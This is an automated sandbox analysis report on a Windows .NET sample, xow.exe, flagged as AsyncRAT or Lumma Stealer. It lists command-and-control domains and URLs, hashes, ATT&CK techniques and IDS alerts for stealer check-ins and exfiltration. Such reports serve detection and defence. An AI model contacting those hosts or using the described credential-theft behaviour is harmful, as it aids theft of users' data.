Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	321 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	21 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
xow.exe	32%	Virustotal		Browse
xow.exe	58%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
xow.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://jarry-fixxer.bond/D	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond:443/api4p.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond:443/api	100%	Avira URL Cloud	malware
https://jarry-fixxer.bond/apiF	0%	Avira URL Cloud	safe
https://growthselec.bond:443/api	100%	Avira URL Cloud	phishing
https://jarry-fixxer.bond/P	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond:443/apiS	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond:443/apiu	0%	Avira URL Cloud	safe
longingfluffyr.cyou	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond/	0%	Avira URL Cloud	safe
https://jarry-fixxer.bond/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jarry-fixxer.bond	104.21.78.5	true	false	high
pain-temper.bond	unknown	unknown	true	unknown
jarry-deatile.bond	unknown	unknown	true	unknown
crookedfoshe.bond	unknown	unknown	false	high
immolatechallen.bond	unknown	unknown	true	unknown
stripedre-lot.bond	unknown	unknown	true	unknown
growthselec.bond	unknown	unknown	true	unknown
longingfluffyr.cyou	unknown	unknown	true	unknown
strivehelpeu.bond	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
jarry-deatile.bond	false		high
pain-temper.bond	false		high
growthselec.bond	false		high
longingfluffyr.cyou	true	Avira URL Cloud: safe	unknown
immolatechallen.bond	false		high
stripedre-lot.bond	false		high
jarry-fixxer.bond	false		high
https://jarry-fixxer.bond/api	true	Avira URL Cloud: malware	unknown
crookedfoshe.bond	false		high
strivehelpeu.bond	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jarry-fixxer.bond/D	xow.exe, 00000001.00000002.1939178246.000000000090A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://jarry-fixxer.bond/apiF	xow.exe, 00000001.00000002.1938561850.000000000085C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarry-fixxer.bond/	xow.exe, 00000001.00000002.1938561850.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, xow.exe, 00000001.00000002.1939889163.0000000003030000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://jarry-fixxer.bond:443/apiu	xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://jarry-fixxer.bond:443/api	xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft.	xow.exe, 00000001.00000002.1938561850.00000000008B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jarry-fixxer.bond:443/api4p.default-release/key4.dbPK	xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://jarry-fixxer.bond:443/apiS	xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	false		high
https://growthselec.bond:443/api	xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://jarry-fixxer.bond/P	xow.exe, 00000001.00000002.1939178246.000000000090A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.78.5	jarry-fixxer.bond	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1596726
Start date and time:	2025-01-22 12:23:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xow.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@9/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 314 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:24:00	API Interceptor	9x Sleep call for process: xow.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jarry-fixxer.bond	https://jarry-fixxer.bond	Get hash	malicious	Unknown	Browse	172.67.214.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse	172.67.74.152
	ScreenUpdateSync.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.91.131
	https://connect.jumpcelibateencounter.shop/monica.raw	Get hash	malicious	Unknown	Browse	172.67.156.121
	https://norpor.shop/riiw2-1.mp4	Get hash	malicious	Unknown	Browse	104.16.123.96
	arm7	Get hash	malicious	Unknown	Browse	1.12.64.8
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.18.188.223
	HBL NO NGT25010873.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	REQUEST FOR QUOTATION_2500320057..exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	299371485_14108825808_1736351479899.exe	Get hash	malicious	ReverseShell, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	download.ps1	Get hash	malicious	KongTuke	Browse	104.20.23.46

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ScreenUpdateSync.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.5
	escsvc64.exe	Get hash	malicious	Unknown	Browse	104.21.78.5
	escsvc64.exe	Get hash	malicious	Unknown	Browse	104.21.78.5
	data_4.exe	Get hash	malicious	LummaC	Browse	104.21.78.5
	data_4.exe	Get hash	malicious	LummaC	Browse	104.21.78.5
	random.exe	Get hash	malicious	Amadey, Babadeda, Credential Flusher, Cryptbot, GCleaner, LummaC Stealer, Stealc	Browse	104.21.78.5
	rJDqJIa.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.5
	random.exe	Get hash	malicious	LummaC	Browse	104.21.78.5
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.5
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.5

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.854653946897287
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	xow.exe
File size:	1'450'496 bytes
MD5:	319c0c96d2317eadf4271f5149edea3a
SHA1:	a913b78394bd26fbc7916ebe960bfd61e8d5d7b9
SHA256:	c0f74200267a768eb6f8a392a708c9cede9062e0e9d4391040ae94b495450d0d
SHA512:	5bef450b570f1a25efe0b7a9d1b04abf2f0ea6ed114b82d66f45a8e1bf58b12087f259351bdc8493dc78bab4d3eca87350a935cca154c23b101a31d5b9c5cdd8
SSDEEP:	24576:kqPsPqYt0qludPdWS/btgA9CDn2u7dWxGyR0t/2AF0j0ndGByvzNOTYA:kqLYtzluVdHDjifoxDaN0j0nYBGBC
TLSH:	4365029CD3891622D6BF0B3798D2712587B4E635EF8EF39E21880AF71D5775288C0762
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.g............................f6... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x563666
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67895C1F [Thu Jan 16 19:21:03 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16361c	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x164000	0x56e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x166000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x16166c	0x161800	86c1871d6f67c9ed7fdb305d293275b0	False	0.8984133276608911	data	7.858242567087758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x164000	0x56e	0x600	cffb69627795a7d7e32b00699a0c320f	False	0.412109375	data	4.016216467694393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x166000	0xc	0x200	35d4c918a04dc96cf82fd7ff9ecf1f87	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x16405c	0x2ec	data			0.4358288770053476
RT_MANIFEST	0x164384	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-22T12:24:01.162265+0100	2059239	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strivehelpeu .bond)	1	192.168.2.4	53887	1.1.1.1	53	UDP
2025-01-22T12:24:01.174972+0100	2059219	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crookedfoshe .bond)	1	192.168.2.4	55507	1.1.1.1	53	UDP
2025-01-22T12:24:01.187409+0100	2059225	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immolatechallen .bond)	1	192.168.2.4	51568	1.1.1.1	53	UDP
2025-01-22T12:24:01.200231+0100	2059237	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stripedre-lot .bond)	1	192.168.2.4	50141	1.1.1.1	53	UDP
2025-01-22T12:24:01.212260+0100	2059223	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (growthselec .bond)	1	192.168.2.4	54397	1.1.1.1	53	UDP
2025-01-22T12:24:01.222829+0100	2059227	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-deatile .bond)	1	192.168.2.4	58897	1.1.1.1	53	UDP
2025-01-22T12:24:01.238349+0100	2059233	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pain-temper .bond)	1	192.168.2.4	58618	1.1.1.1	53	UDP
2025-01-22T12:24:01.250344+0100	2059229	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (jarry-fixxer .bond)	1	192.168.2.4	65226	1.1.1.1	53	UDP
2025-01-22T12:24:01.930909+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:01.930909+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:02.893451+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:02.893451+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.78.5	443	TCP
2025-01-22T12:24:03.519161+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:03.519161+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:04.494734+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:04.494734+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.78.5	443	TCP
2025-01-22T12:24:05.451992+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49733	104.21.78.5	443	TCP
2025-01-22T12:24:05.451992+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.78.5	443	TCP
2025-01-22T12:24:14.411812+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49733	104.21.78.5	443	TCP
2025-01-22T12:24:14.917837+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49734	104.21.78.5	443	TCP
2025-01-22T12:24:14.917837+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.78.5	443	TCP
2025-01-22T12:24:16.563940+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49735	104.21.78.5	443	TCP
2025-01-22T12:24:16.563940+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.78.5	443	TCP
2025-01-22T12:24:18.778898+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49737	104.21.78.5	443	TCP
2025-01-22T12:24:18.778898+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.78.5	443	TCP
2025-01-22T12:24:21.106698+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49742	104.21.78.5	443	TCP
2025-01-22T12:24:21.106698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.78.5	443	TCP
2025-01-22T12:24:23.479506+0100	2059230	ET MALWARE Observed Win32/Lumma Stealer Related Domain (jarry-fixxer .bond in TLS SNI)	1	192.168.2.4	49744	104.21.78.5	443	TCP
2025-01-22T12:24:23.479506+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.78.5	443	TCP
2025-01-22T12:24:23.998870+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49744	104.21.78.5	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 12:24:01.269479036 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:01.269575119 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:01.269663095 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:01.273070097 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:01.273104906 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:01.930807114 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:01.930908918 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:01.950782061 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:01.950866938 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:01.951896906 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.001718998 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.392153978 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.392153978 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.392510891 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.893510103 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.893784046 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.893866062 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.895306110 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.895370960 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.895409107 CET	49731	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.895425081 CET	443	49731	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.904484987 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.904539108 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:02.904719114 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.904928923 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:02.904949903 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:03.519084930 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:03.519160986 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:03.520781994 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:03.520790100 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:03.521074057 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:03.522559881 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:03.522624969 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:03.522643089 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494714022 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494770050 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494796038 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494832993 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494857073 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494883060 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494909048 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494929075 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.494929075 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.494952917 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.494982958 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.495184898 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.496676922 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.496743917 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.496784925 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.496792078 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.548686028 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.548696995 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.582959890 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.582998991 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.583023071 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.583026886 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.583039999 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.583143950 CET	443	49732	104.21.78.5	192.168.2.4
Jan 22, 2025 12:24:04.583190918 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.583190918 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.583353043 CET	49732	443	192.168.2.4	104.21.78.5
Jan 22, 2025 12:24:04.583369970 CET	443	49732	104.21.78.5	192.168.2.4
